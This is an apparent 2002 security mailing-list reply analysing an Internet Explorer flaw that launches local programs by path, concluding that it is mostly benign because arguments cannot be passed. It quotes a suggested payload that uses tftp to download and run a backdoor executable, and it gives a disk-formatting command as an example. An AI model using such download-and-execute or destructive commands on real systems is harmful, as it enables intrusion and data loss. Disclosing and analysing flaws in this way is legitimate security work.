Re: Rather large MSIE-hole

From: Slow2Show (sl2shoat_private)
Date: Thu Mar 14 2002 - 01:30:05 PST

    >I havent tried, since i don't run MS, how about ?
    >var programName=new Array(
    >'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET
    ncx99.exe',
    >'c:/winnt/system32/ncx99.exe');

    I tried you idea nocon...it seems that the codebase
    will not let you pass any parameters...
    so 'C:/WINDOWS/system32/calc.exe' will work
    but 'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET
    ncx99.exe' will not because of the parameters

    I've researched getting this to work by using  unicode
    chars to see if there was something that you could
    put in to bypass this...but alas it wont work…note that
    spaces are allowed in the directory path, but not after
    the program name.

    so this would work:
    'C:/Program Files/intern~1/IEXPLORER.exe'

    but these wont:
    'C:/Program Files/intern~1/IEXPLORER.exe -k'
    'C:/WINDOWS/system32/format.com C:'

    //pseudo code...showing the concept of how I tried
    every Unicode char
    for(i=0;i<65535;i++)
         $= unicodeCharAt(i)
         'C:/Program Files/intern~/IEXPLORER.exe$-k'

    The only possible attack vector I can see from this is
    if you had prior knowledge to the path of a program
    on a system that you wanted to execute. This is
    slightly dangerous if you are running as admin
    because the telnet server could be started by
    launching
    %SYSTEMROOT%\system32\tlntsess.exe
    But you would still need a valid user/pass to gain
    access.(and you should be slapped if you are web
    browsing as admin)

    I'm glad this hole turned out to be relatively benign...
    this would have turned into a really dangerous hole
    and not just an annoying one if parameters could be
    passed.

    But don't forget that script kiddies could "boot" you
    by executing logoff.exe/tsshutdn.exe/tsdiscon.exe/

    if anybody else finds a way of getting the parameters
    to work....please post to the list.

    lata,

    -Slow2Show-
    University of Florida